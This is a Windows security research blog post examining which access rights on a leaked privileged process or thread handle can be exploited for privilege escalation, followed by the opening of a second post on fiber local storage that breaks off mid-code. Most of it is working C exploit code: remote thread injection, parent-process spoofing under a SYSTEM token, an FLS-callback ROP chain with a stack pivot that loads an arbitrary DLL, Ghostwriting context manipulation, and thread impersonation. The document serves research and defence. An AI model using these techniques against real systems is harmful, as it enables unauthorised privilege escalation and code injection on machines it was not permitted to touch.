A more recent example is a Dell LPE [2] in which a THREAD_ALL_ACCESS handle was obtained from a privileged process. They were able to exploit this via a dropped DLL and an APC.

Setup

In this post, I wanted to examine all possible access rights to determine which were exploitable on their own and which were not. Of those that were not, I tried to determine what concoction of privileges was necessary to make them so. I’ve tried to stay “realistic” here based on my experience, but you never know what you’ll find in the wild, and this post reflects that.

For testing, I created a simple client and server: a privileged server that leaks a handle, and a client capable of consuming it. Here’s the server:

#include "pch.h"
#include <iostream>
#include <Windows.h>

int main(int argc, char **argv)
{
    if (argc <= 1) {
        printf("[-] Please give me a target PID\n");
        return -1;
    }

    HANDLE hUserToken, hUserProcess;
    HANDLE hProcess, hThread;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    hUserProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, atoi(argv[1]));
    if (!OpenProcessToken(hUserProcess, TOKEN_ALL_ACCESS, &hUserToken)) {
        printf("[-] Failed to open user process: %d\n", GetLastError());
        CloseHandle(hUserProcess);
        return -1;
    }

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
    printf("[+] Process: %x\n", hProcess);

    CreateProcessAsUserA(hUserToken, 
        "VulnServiceClient.exe", 
        NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
    // block on the child so the privileged process stays alive while the
    // client exploits the leaked handle
    WaitForSingleObject(pi.hProcess, INFINITE);
    return 0;
}

In the above, I’m grabbing a handle to the token we want to impersonate, opening an inheritable handle to the current process (which we’re running as SYSTEM), then spawning a child process. This child process is simply my client application, which will go about attempting to exploit the handle.

The client is, of course, a little more involved. The only component that needs a little discussion up front is fetching the leaked handle. This can be done via NtQuerySystemInformation and does not require any special privileges:

void ProcessHandles()
{
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    _NtQuerySystemInformation NtQuerySystemInformation =
        (_NtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
    _NtDuplicateObject NtDuplicateObject =
        (_NtDuplicateObject)GetProcAddress(hNtdll, "NtDuplicateObject");
    _NtQueryObject NtQueryObject =
        (_NtQueryObject)GetProcAddress(hNtdll, "NtQueryObject");
    _RtlEqualUnicodeString RtlEqualUnicodeString =
        (_RtlEqualUnicodeString)GetProcAddress(hNtdll, "RtlEqualUnicodeString");
    _RtlInitUnicodeString RtlInitUnicodeString = 
        (_RtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

    ULONG handleInfoSize = 0x10000;
    NTSTATUS status;
    PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
    DWORD dwPid = GetCurrentProcessId();


    printf("[+] Looking for process handles...\n");

    while ((status = NtQuerySystemInformation(
        SystemHandleInformation,
        phHandleInfo,
        handleInfoSize,
        NULL
    )) == STATUS_INFO_LENGTH_MISMATCH)
        phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(phHandleInfo, handleInfoSize *= 2);

    if (status != STATUS_SUCCESS)
    {
        printf("NtQuerySystemInformation failed!\n");
        return;
    }

    printf("[+] Fetched %d handles\n", phHandleInfo->HandleCount);

    // iterate handles until we find the privileged process
    for (int i = 0; i < phHandleInfo->HandleCount; ++i)
    {
        SYSTEM_HANDLE handle = phHandleInfo->Handles[i];
        POBJECT_TYPE_INFORMATION objectTypeInfo;
        PVOID objectNameInfo;
        UNICODE_STRING objectName;
        ULONG returnLength;

        // Check if this handle belongs to the PID the user specified
        if (handle.ProcessId != dwPid)
            continue;

        objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectTypeInformation,
            objectTypeInfo,
            0x1000,
            NULL
        ) != STATUS_SUCCESS)
            continue;

        if (handle.GrantedAccess == 0x0012019f)
        {
            free(objectTypeInfo);
            continue;
        }

        objectNameInfo = malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectNameInformation,
            objectNameInfo,
            0x1000,
            &returnLength
        ) != STATUS_SUCCESS)
        {
            objectNameInfo = realloc(objectNameInfo, returnLength);
            if (NtQueryObject(
                (HANDLE)handle.Handle,
                ObjectNameInformation,
                objectNameInfo,
                returnLength,
                NULL
            ) != STATUS_SUCCESS)
            {
                free(objectTypeInfo);
                free(objectNameInfo);
                continue;
            }
        }

        // check if we've got a process object; there should only be one, but should we 
        // have multiple, this is where we'd perform the checks
        objectName = *(PUNICODE_STRING)objectNameInfo;
        UNICODE_STRING pProcess, pThread;

        RtlInitUnicodeString(&pThread, L"Thread");
        RtlInitUnicodeString(&pProcess, L"Process");
        if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pProcess, TRUE) && TARGET == 0) {
            printf("[+] Found process handle (%x)\n", handle.Handle);
            HANDLE hProcess = (HANDLE)handle.Handle;
        }
        else if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pThread, TRUE) && TARGET == 1) {
            printf("[+] Found thread handle (%x)\n", handle.Handle);
            HANDLE hThread = (HANDLE)handle.Handle;
        }
        else
            continue;
        
        free(objectTypeInfo);
        free(objectNameInfo);
    }
} 

We’re essentially just fetching all system handles, filtering down to ones belonging to our process, then hunting for a thread or a process. In a more active client process with many threads or process handles we’d need to filter down further, but this is sufficient for testing.
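
For instance, the granted access mask on each SYSTEM_HANDLE is a quick way to narrow the field to handles worth attacking. A hedged example, using the rights covered below:

// skip process handles that carry none of the rights we know how to exploit
if ((handle.GrantedAccess & (PROCESS_DUP_HANDLE | PROCESS_CREATE_PROCESS |
                             PROCESS_CREATE_THREAD | PROCESS_VM_WRITE)) == 0)
    continue;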

The remainder of this post will be broken down into process and thread security access rights.

Process

There are approximately 14 process-specific rights[3]. We’re going to ignore the standard object access rights for now (DELETE, READ_CONTROL, etc.) as they apply more to the handle itself than what it allows one to do.

Right off the bat, we’re going to dismiss the following:

PROCESS_QUERY_INFORMATION
PROCESS_QUERY_LIMITED_INFORMATION
PROCESS_SUSPEND_RESUME
PROCESS_TERMINATE
PROCESS_SET_QUOTA
PROCESS_VM_OPERATION
PROCESS_VM_READ
SYNCHRONIZE

To be clear, I’m only suggesting that the above access rights cannot be exploited on their own; they are, of course, very useful when roped in with others. There may be weird edge cases in which one of these might be useful (PROCESS_TERMINATE, for example), but barring any magic, I don’t see how.

That leaves the following:

PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_SET_INFORMATION
PROCESS_VM_WRITE

We’ll run through each of these individually.

PROCESS_ALL_ACCESS

The most obvious of them all, this one grants us access to it all. We can simply allocate memory and create a thread to obtain code execution:

char payload[] = "\xcc\xcc";
LPVOID lpBuf = VirtualAllocEx(hProcess, NULL, 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, lpBuf, payload, 2, NULL);
CreateRemoteThread(hProcess, NULL, 0, lpBuf, 0, 0, NULL);

Nothing to it.

PROCESS_CREATE_PROCESS

This right is “required to create a process”, which is to say that we can spawn child processes. To do this remotely, we just need to spawn a process and set its parent to the privileged process we’ve got a handle to. The new process then inherits its parent’s token, which will hopefully be a SYSTEM token.

Here’s how we do that:

STARTUPINFOEXA sinfo = { sizeof(sinfo) };
PROCESS_INFORMATION pinfo;
LPPROC_THREAD_ATTRIBUTE_LIST ptList = NULL;
SIZE_T bytes;

sinfo.StartupInfo.cb = sizeof(STARTUPINFOEXA);
InitializeProcThreadAttributeList(NULL, 1, 0, &bytes);
ptList = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(bytes);
InitializeProcThreadAttributeList(ptList, 1, 0, &bytes);

UpdateProcThreadAttribute(ptList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hPrivProc, sizeof(HANDLE), NULL, NULL);
sinfo.lpAttributeList = ptList;

CreateProcessA("cmd.exe", (LPSTR)"cmd.exe /c calc.exe", 
        NULL, NULL, TRUE, 
        EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, 
        &sinfo.StartupInfo, &pinfo);

We should now have calc running with the privileged token. Obviously we’d want to replace that with something more useful!

PROCESS_CREATE_THREAD

Here we’ve got the ability to use CreateRemoteThread, but can’t control any memory in the target process. There are of course ways we can influence memory without direct write access, such as WNF, but we’d still have no way of resolving those addresses. As it turns out, however, we don’t need the control. CreateRemoteThread can be pointed at a function with a single argument, which gives us quite a bit of control. LoadLibraryA and WinExec are both great candidates for executing child processes or loading arbitrary code.

As example, there’s an ANSI cmd.exe located in msvcrt.dll at offset 0x503b8. We can pass this as an argument to CreateRemoteThread and trigger a WinExec call to pop a shell:

DWORD dwCmd = (GetModuleBaseAddress(GetCurrentProcessId(), L"msvcrt.dll") + 0x503b8);
HANDLE hThread = CreateRemoteThread(hPrivProc, NULL, 0,
                        (LPTHREAD_START_ROUTINE)WinExec, 
                        (LPVOID)dwCmd, 
                        0, NULL);

We can do something similar with LoadLibraryA. This, of course, is predicated on the system path containing a directory writable by our user.
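
A sketch of that variant follows; dwStr here is an assumption, pointing at a string already present in the target that the loader will resolve, via the DLL search path, to a file we planted:

// hypothetical: dwStr holds the remote address of a suitable module name string
HANDLE hThread = CreateRemoteThread(hPrivProc, NULL, 0,
                        (LPTHREAD_START_ROUTINE)LoadLibraryA,
                        (LPVOID)dwStr,
                        0, NULL);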

PROCESS_DUP_HANDLE

Microsoft’s own documentation on process security and access rights points to this specifically as a sensitive right. Using it, we can simply duplicate our process handle with PROCESS_ALL_ACCESS, allowing us full RW to its address space. As per Ivan Fratric’s JIT bug, it’s as simple as this:

HANDLE hDup = INVALID_HANDLE_VALUE;
DuplicateHandle(hPrivProc, GetCurrentProcess(), GetCurrentProcess(), &hDup, PROCESS_ALL_ACCESS, 0, 0)

Now we can simply follow the WriteProcessMemory/CreateRemoteThread strategy for executing arbitrary code.

PROCESS_SET_INFORMATION

Granting this permission allows one to call SetProcessInformation, as well as to set several fields via NtSetInformationProcess. The latter is far more powerful, but many of the PROCESSINFOCLASS fields available are either read-only or require additional privileges to actually set (SeDebugPrivilege for ProcessExceptionPort and ProcessInstrumentationCallback (Win7), for example). Process Hacker[15] maintains an up-to-date definition of this class and its members.

Of the available flags, none were particularly interesting on their own. I needed to add PROCESS_VM_* privileges in order to make any of them usable, and at that point the purpose is defeated.

PROCESS_VM_*

This covers the three flavors of VM access: WRITE/READ/OPERATION. The first two should be self-explanatory; the third allows one to operate on the virtual address space itself, such as changing page protections (VirtualProtectEx) or allocating memory (VirtualAllocEx). I won’t address each permutation of these three, but I think it’s reasonable to assume that PROCESS_VM_WRITE is a necessary requirement. While PROCESS_VM_OPERATION allows us to crash the remote process, which could open up other flaws, it’s neither a generic nor an elegant approach. Ditto with PROCESS_VM_READ.

PROCESS_VM_WRITE proved to be a challenge on its own, and I was unable to come up with a generic solution. At first blush, the entire set of Shatter-like injection strategies documented by Hexacorn[12] seem like they’d be perfect. They simply require the remote process to use windows, clipboard registrations, etc. None of these are guaranteed, but chances are one is bound to exist. Unfortunately for us, many of them are restricted across sessions or differing integrity levels. We can write into the remote process, but we need some way to gain control over execution flow.

In addition to being unable to modify page permissions, we cannot read memory nor map/allocate it. There are plenty of ways we can leak addresses from the remote process without directly interfacing with it, however.

Using NtQuerySystemInformation, for example, we can enumerate all threads inside a remote process regardless of its IL. This grants us a list of SYSTEM_EXTENDED_THREAD_INFORMATION objects which contain, among other things, the address of the TEB. NtQueryInformationProcess allows us to fetch the remote process PEB address. This latter API requires the PROCESS_QUERY_INFORMATION right, however, which ended up throwing a major wrench in my plan. Because of this, I’m appending PROCESS_QUERY_INFORMATION onto PROCESS_VM_WRITE, which gives us the necessary components to pull this off. If someone knows of a way to leak the address of a remote process PEB without it, I’d love to hear it.
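
As a sketch, the GetRemotePeb helper used in the code below can be built directly on NtQueryInformationProcess (this is the piece that drags in PROCESS_QUERY_INFORMATION); GetRemoteTeb is analogous, pulled from the SYSTEM_EXTENDED_THREAD_INFORMATION entries mentioned above:

// one possible shape of the GetRemotePeb helper; assumes the usual
// _NtQueryInformationProcess typedef and a handle with PROCESS_QUERY_INFORMATION
SIZE_T GetRemotePeb(HANDLE hProcess)
{
    _NtQueryInformationProcess NtQueryInformationProcess =
        (_NtQueryInformationProcess)GetProcAddress(GetModuleHandleA("ntdll"),
                                                   "NtQueryInformationProcess");
    PROCESS_BASIC_INFORMATION pbi = { 0 };

    // ProcessBasicInformation (0) returns the remote PEB base address
    NtQueryInformationProcess(hProcess, PROCESSINFOCLASS(0), &pbi, sizeof(pbi), NULL);
    return (SIZE_T)pbi.PebBaseAddress;
}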

The approach I took was a bit loopy, but it ended up working reliably and generically. If you’ve read my previous post on fiber local storage (FLS)[13], this is the research I was referring to. If you haven’t, I recommend giving it a brief read, but I’ll regurgitate a bit of it here.

Briefly, we can abuse fibers and FLS to overwrite callbacks which are executed “…on fiber deletion, thread exit, and when an FLS index is freed”. The primary thread of a process will always set up a fiber, thus there will always be a callback for us to overwrite (msvcrt!_freefls). Callbacks are stored in the PEB (FlsCallback) and the fiber local storage in the TEB (FlsData). By smashing the FlsCallback, we can obtain control over execution flow when one of those fiber actions is taken.

With only write access to the process, however, this becomes a bit convoluted. We cannot allocate memory and so we need some known location to put the payload. In addition, the FlsCallback and FlsData variables in PEB/TEB are pointers and we’re unable to read these.

Stashing the payload turned out to be pretty simple. Since we’ve established we can leak PEB/TEB addresses we already have two powerful primitives. After looking over both structures, I found that thread local storage (TLS) happened to provide us with enough room to store ROP gadgets and a thin payload. TLS is embedded within the structure itself, so we can simply offset into the TEB address (which we have). If you’re unfamiliar with TLS, Skywing’s write-ups are fantastic and have aged well[14].

Gaining control over the callback was a little trickier. A pointer to a _FLS_CALLBACK_INFO structure is stored in the PEB (FlsCallback) and is an opaque structure. Since we can’t actually read this pointer, we have no simple way of overwriting the pointer. Or do we?

What I ended up doing is overwriting the FlsCallback pointer itself in the PEB, essentially creating my own fake _FLS_CALLBACK_INFO structure in TLS. It’s a pretty simple structure and really only has one value of importance: the callback pointer.

In addition, as per the FLS article, we also need to take control over ECX/RCX. This will allow us to stack pivot and continue executing our ROP payload. This requires that we update the TEB->FlsData entry which we also are unable to do, since it’s a pointer. Much like FlsCallback, though, I was able to just overwrite this value and craft my own data structure, which also turned out to be pretty simple. The TLS buffer ended up looking like this:

//
// 0  ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] 41414141 41414141 41414141 41414141 
//

There just so happens to be a perfect stack pivot gadget located in kernelbase!SwitchToFiberContext (or kernel32!SwitchToFiber on Windows 7):

7603c415 8ba1d8000000    mov     esp,dword ptr [ecx+0D8h]
7603c41b c20400          ret     4

Putting this all together, execution results in:

eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c415 esp=0019fd6c ebp=0019fd84 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
kernel32!SwitchToFiber+0x115:
7603c415 8ba1d8000000    mov     esp,dword ptr [ecx+0D8h]
ds:0023:7ffdee2c=7ffdee30
0:000> p
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c41b esp=7ffdee30 ebp=0019fd84 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
kernel32!SwitchToFiber+0x11b:
7603c41b c20400          ret     4
0:000> dd esp l3
7ffdee30  41414141 41414141 41414141

Now we’ve got EIP and a stack pivot. Instead of marking memory and executing some other payload, I took a quick and lazy strategy and simply called LoadLibraryA to load a DLL off disk from an arbitrary location. This works well, is reliable, and even on process exit will execute and block, depending on what you do within the DLL. Here’s the final code to achieve all this:

_NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll"), "NtWriteVirtualMemory");

LPVOID lpBuf = malloc(13*sizeof(SIZE_T));
HANDLE hProcess = OpenProcess(PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, FALSE, dwTargetPid);
if (hProcess == NULL)
    return;

SIZE_T LoadLibA = (SIZE_T)LoadLibraryA;
SIZE_T RemoteTeb = GetRemoteTeb(hProcess), TlsAddr = 0;
TlsAddr = RemoteTeb + 0xe10;

SIZE_T RemotePeb = GetRemotePeb(hProcess);
SIZE_T PivotGadget = 0x7603c415;
SIZE_T StackAddress = (TlsAddr + 28) - 0xd8;
SIZE_T RtlExitThread = (SIZE_T)GetProcAddress(GetModuleHandleA("ntdll"), "RtlExitUserThread");
SIZE_T LoadLibParam = (SIZE_T)TlsAddr + 48;

//
// construct our TlsSlots payload:
// 0  ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] [LOADLIB ADDR] 41414141 [RET ADDR] [LOADLIB ARG PTR]
// 48 ] 41414141
//

memset(lpBuf, 0x0, 16);
*((DWORD*)lpBuf + 2) = PivotGadget;
*((DWORD*)lpBuf+ 4) = 0;
*((DWORD*)lpBuf + 5) = 0;
*((DWORD*)lpBuf + 6) = StackAddress;

StackAddress = TlsAddr + 32;
*((DWORD*)lpBuf + 7) = StackAddress;
*((DWORD*)lpBuf + 8) = LoadLibA;
*((DWORD*)lpBuf + 9) = 0x41414141; // junk
*((DWORD*)lpBuf + 10) = RtlExitThread;
*((DWORD*)lpBuf + 11) = (SIZE_T)TlsAddr + 48;
*((DWORD*)lpBuf + 12) = 0x41414141; // DLL name (AAAA.dll)

NtWriteVirtualMemory(hProcess, (PVOID)TlsAddr, lpBuf, (13 * sizeof(SIZE_T)), NULL);

// update FlsCallback in PEB and FlsData in TEB
StackAddress = TlsAddr + 12;
NtWriteVirtualMemory(hProcess, (LPVOID)(RemoteTeb + 0xfb4), (PVOID)&StackAddress, sizeof(SIZE_T), NULL);
NtWriteVirtualMemory(hProcess, (LPVOID)(RemotePeb + 0x20c), (PVOID)&TlsAddr, sizeof(SIZE_T), NULL);

If all goes well, you should see attempts to load AAAA.dll off disk when the callback is executed (just close the process). As a note, we’re using NtWriteVirtualMemory here because WriteProcessMemory requires PROCESS_VM_OPERATION, which we may not have.

Another variation of this access might be PROCESS_VM_WRITE|PROCESS_VM_READ. This gives us visibility into the address space, but we still cannot allocate or map memory into the remote process. Using the above strategy, we can rid ourselves of the PROCESS_QUERY_INFORMATION requirement and simply read the PEB address out of the TEB.
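
A sketch of that read: on x86 the PEB pointer sits at TEB+0x30 (TEB+0x60 on x64), so with PROCESS_VM_READ in hand:

// read the remote PEB base straight out of the TEB (x86 offsets assumed here)
SIZE_T RemotePeb = 0;
ReadProcessMemory(hProcess, (LPVOID)(RemoteTeb + 0x30), &RemotePeb, sizeof(RemotePeb), NULL);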

Finally, consider PROCESS_VM_WRITE|PROCESS_VM_READ|PROCESS_VM_OPERATION. Granting us PROCESS_VM_OPERATION loosens the restrictions quite a bit, as we can now allocate memory and change page permissions. This allows us to more easily use the above strategy, but also perform inline and IAT hooks.

Thread

As with the process handles, there are a handful of access rights we can dismiss immediately:

SYNCHRONIZE
THREAD_QUERY_INFORMATION
THREAD_GET_CONTEXT
THREAD_QUERY_LIMITED_INFORMATION
THREAD_SUSPEND_RESUME
THREAD_TERMINATE

Which leaves the following:

THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_IMPERSONATE
THREAD_SET_CONTEXT
THREAD_SET_INFORMATION
THREAD_SET_LIMITED_INFORMATION
THREAD_SET_THREAD_TOKEN

THREAD_ALL_ACCESS

There’s quite a lot we can do with this, including everything described in the following thread access rights sections. I personally find the THREAD_DIRECT_IMPERSONATION strategy to be the easiest.

There is another option that is a bit more arcane, but equally viable. Note that this thread access doesn’t give us VM read/write privileges, so there’s no easy way to “write” into a thread, since that doesn’t really make sense. What we do have, however, is a series of APIs that sort of grant us that: SetThreadContext[4] and GetThreadContext[5]. About a decade ago a code injection technique dubbed Ghostwriting[6] was released to little fanfare. In it, the author describes a code injection strategy that does not require the typical win32 API calls; there’s no WriteProcessMemory, NtMapViewOfSection, or even OpenProcess.

While the write-up is lacking in a few departments, it’s quite a clever bit of code. In short, the author abuses the SetThreadContext/GetThreadContext calls in tandem with a set of specific assembly gadgets to write a payload, dword by dword, onto the thread’s stack. Once written, they use NtProtectVirtualMemory to mark the code RWX and redirect code flow to their payload.

For their write gadget, they hunt for a pattern inside NTDLL:

MOV [REG1], REG2
RET

They then locate a JMP $, or jump here, which will operate as an auto lock and infinitely loop. Once we’ve found our two gadgets, we suspend the thread. We update its RIP to point to the MOV gadget, set our REG1 to an adjusted RSP so the return address is the JMP $, and set REG2 to the jump gadget. Here’s my write function:

void WriteQword(CONTEXT context, HANDLE hThread, size_t WriteWhat, size_t WriteWhere)
{
    SetContextRegister(&context, g_rside, WriteWhat);
    SetContextRegister(&context, g_lside, WriteWhere);

    context.Rsp = StackBase;
    context.Rip = MovAddr;

    WaitForThreadAutoLock(hThread, &context, JmpAddr);
}

The SetContextRegister call simply assigns REG1 and REG2 in our gadget to the appropriate registers. Once those are set, we set our stack base (adjusted from the thread’s RSP) and update RIP to our gadget. The first time we execute this, we’ll write our JMP $ gadget to the stack.
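
A minimal sketch of what SetContextRegister might look like; the index encoding for g_lside/g_rside here is hypothetical and depends on how the discovered gadget is cataloged:

// map a gadget register index onto the thread context; only a few registers
// shown, extend for whichever MOV [REG1], REG2 gadget was found
void SetContextRegister(CONTEXT *ctx, int reg, size_t value)
{
    switch (reg) {
    case 0: ctx->Rax = value; break;
    case 1: ctx->Rcx = value; break;
    case 2: ctx->Rdx = value; break;
    case 3: ctx->Rbx = value; break;
    case 6: ctx->Rsi = value; break;
    case 7: ctx->Rdi = value; break;
    }
}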

They use what they call a thread auto lock to control execution flow (edits mine):

void WaitForThreadAutoLock(HANDLE Thread, CONTEXT* PThreadContext, DWORD AutoLockTargetEIP)
{
    SetThreadContext(Thread,PThreadContext);

    do
    {
        ResumeThread(Thread);
        Sleep(30); 
        SuspendThread(Thread);
        GetThreadContext(Thread,PThreadContext);
    }
    while(PThreadContext->Eip!=AutoLockTargetEIP);
}

It’s really just a dumb waiter that allows the thread to execute a little bit each run before checking if the “sink” gadget has been reached.

Once our execution hits the jump, we have our write primitive. We can now simply adjust RIP back to the MOV gadget, update RSP, and set REG1 and REG2 to any values we want.

I ported the core function of this technique to x64 to demonstrate its viability. Instead of using it to execute an entire payload, I simply execute LoadLibraryA to load in an arbitrary DLL at an arbitrary path. The code is available on Github[11]. Turning it into something production ready is left as an exercise for the reader ;)

Additionally, while attending Blackhat 2019, I saw a process injection talk by the SafeBreach Labs group. They’ve released a code injection tool that contains an x64 implementation of GhostWriting[10]. While I haven’t personally evaluated it, it’s probably more production ready and usable than mine.

THREAD_DIRECT_IMPERSONATION

This differs from THREAD_IMPERSONATE in that it allows the thread token to be impersonated, not simply TO impersonate. Exploiting this is simply a matter of using the NtImpersonateThread[8] API, as pointed out by James Forshaw[0][7]. Using this we’re able to create a thread totally under our control and impersonate the privileged one:

hNewThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpRtl, 0, CREATE_SUSPENDED, &dwTid);
NtImpersonateThread(hNewThread, hThread, &sqos);

The hNewThread will now be executing with a SYSTEM token, allowing us to do whatever we need under the privileged impersonation context.
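
For reference, the sqos passed above is a plain SECURITY_QUALITY_OF_SERVICE requesting impersonation-level access, along these lines (lpRtl in the snippet is presumably just a benign start routine for the suspended thread):

SECURITY_QUALITY_OF_SERVICE sqos = { 0 };
sqos.Length = sizeof(sqos);
sqos.ImpersonationLevel = SecurityImpersonation;
sqos.ContextTrackingMode = SECURITY_STATIC_TRACKING;
sqos.EffectiveOnly = FALSE;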

THREAD_IMPERSONATE

Unfortunately I was unable to identify a surefire, generic method for exploiting this one. We have no ability to query the remote thread, nor can we gain any control over its execution flow. We’re simply allowed to manage its impersonation state.

We can use this to force the privileged thread to impersonate us, using the NtImpersonateThread call, which may unlock additional logic bugs in the application. For example, if the service creates shared resources, such as a file, while impersonating us rather than running as SYSTEM, we gain ownership over that resource. If multiple privileged threads then access it for information (such as configuration), it could lead to code execution.
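
A sketch of forcing that impersonation, reusing the sqos shown earlier; here the privileged thread (hThread) is made to impersonate our current thread:

NtImpersonateThread(hThread, GetCurrentThread(), &sqos);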

THREAD_SET_CONTEXT

While this right grants us access to SetThreadContext, it also conveniently allows us to use QueueUserAPC. This is effectively granting us a CreateRemoteThread primitive, with a caveat: for an APC to be processed by the thread, it needs to enter an alertable state. This happens when a specific set of win32 functions are executed, so it is entirely possible that the thread never becomes alertable.
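
A sketch, reusing the string-in-target trick from the process section; dwRemoteStr is assumed to point at a suitable string already present in the target, since this right gives us no way to write one:

QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)dwRemoteStr);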

If we’re working with an uncooperative thread, SetThreadContext comes in handy. Using it, we can force the thread to become alertable via the NtTestAlert function. Of course, we have no ability to call GetThreadContext and will therefore likely lose control of the thread after exploitation.

In combination with THREAD_GET_CONTEXT, this right would allow us to replicate the Ghostwriting code injection technique discussed in the THREAD_ALL_ACCESS section above.

THREAD_SET_INFORMATION

This right is needed to set various ThreadInformationClass[9] values on a thread, usually via NtSetInformationThread. After looking through all of these, I did not identify any immediate ways in which we could influence the remote thread. Some of the values are interesting but unusable (ThreadSetTlsArrayAddress, ThreadAttachContainer, etc.), being either not implemented/removed or requiring SeDebugPrivilege or similar.

I’m not really sure what would make this a viable candidate, either; there’s really not a lot of juicy stuff reachable via the available functions.

THREAD_SET_LIMITED_INFORMATION

This allows the caller to set a subset of THREAD_INFORMATION_CLASS values, namely: ThreadPriority, ThreadPriorityBoost, ThreadAffinityMask, ThreadSelectedCpuSets, and ThreadNameInformation. None of these get us anywhere near an exploitable primitive.

THREAD_SET_THREAD_TOKEN

Similar to THREAD_IMPERSONATE, I was unable to find a direct and generic method of abusing this right. I can set the thread’s token or modify a few fields (via SetTokenInformation), but this doesn’t grant us much.

Conclusion

I was a little disappointed in how uneventful thread rights seemed to be. Almost half of them proved to be unexploitable on their own, and even in combination did not turn much up. As per above, having one of the following three privileges is necessary to turn a leaked thread handle into something exploitable:

THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_SET_CONTEXT

Missing these will require a deeper understanding of your target and some creativity.

Similarly, processes have a specific subset of rights that are directly exploitable:

PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_VM_WRITE

Barring these, more creativity is required.

References

[0]https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html
[1]https://googleprojectzero.blogspot.com/2018/05/bypassing-mitigations-by-attacking-jit.html
[2]https://d4stiny.github.io/Local-Privilege-Escalation-on-most-Dell-computers/
[3]https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
[4]https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext
[5]https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getthreadcontext
[6]http://blog.txipinet.com/2007/04/05/69-a-paradox-writing-to-another-process-without-openning-it-nor-actually-writing-to-it/
[7]https://tyranidslair.blogspot.com/2017/08/the-art-of-becoming-trustedinstaller.html
[8]https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtImpersonateThread.html
[9]https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/master/NtApiDotNet/NtThreadNative.cs#L51
[10]https://github.com/SafeBreach-Labs/pinjectra
[11]https://gist.github.com/hatRiot/aa77f007601be75684b95fe7ba978079
[12]http://www.hexacorn.com/blog/category/code-injection/
[13]http://hatriot.github.io/blog/2019/08/12/code-execution-via-fiber-local-storage
[14]http://www.nynaeve.net/?p=180
[15]https://github.com/processhacker/processhacker/blob/master/phnt/include/ntpsapi.h#L98

Code Execution via Fiber Local Storage

12 August 2019 at 21:10

While working on another research project (post to be released soon, will update here), I stumbled onto a very Hexacorn[0] inspired type of code injection technique that fit my situation perfectly. Instead of tainting the other post with its description and code, I figured I’d release a separate post describing it here.

When I say that it’s Hexacorn inspired, I mean that the bulk of the strategy is similar to everything else you’ve probably seen; we open a handle to the remote process, allocate some memory, and copy our shellcode into it. At this point we simply need to gain control over execution flow; this is where most of Hexacorn’s techniques come in handy. PROPagate via window properties, WordWarping via rich edit controls, DnsQuery via code pointers, etc. Another great example is Windows Notification Facility via user subscription callbacks (at least in modexp’s proof of concept), though this one isn’t Hexacorn’s.

These strategies are also predicated on the process having certain capabilities (DDE, private clipboards, WNF subscriptions), but more importantly, most, if not all, do not work across sessions or integrity levels. This is obvious and expected and frankly quite niche, but in my situation it was a requirement.

Fibers

Fibers are “a unit of execution that must be manually scheduled by the application”[1]. They are essentially register and stack states that can be swapped in and out at will, and reflect upon the thread in which they are executing. A single thread can be running at most a single fiber at a time, but fibers can be hot-swapped during execution, and their quantum is user controlled.

Fibers can also create and use fiber data. A pointer to this is stored in TEB->NtTib.FiberData and is a per-thread structure. This is initially set during a call to ConvertThreadToFiber. Taking a quick look at this:

void TestFiber()
{
    PVOID lpFiberData = HeapAlloc(GetProcessHeap(), 0, 0x10);
    PVOID lpFirstFiber = NULL;
    memset(lpFiberData, 0x41, 0x10);

    lpFirstFiber = ConvertThreadToFiber(lpFiberData);
    DebugBreak();
}

int main()
{
    DWORD tid = 0;
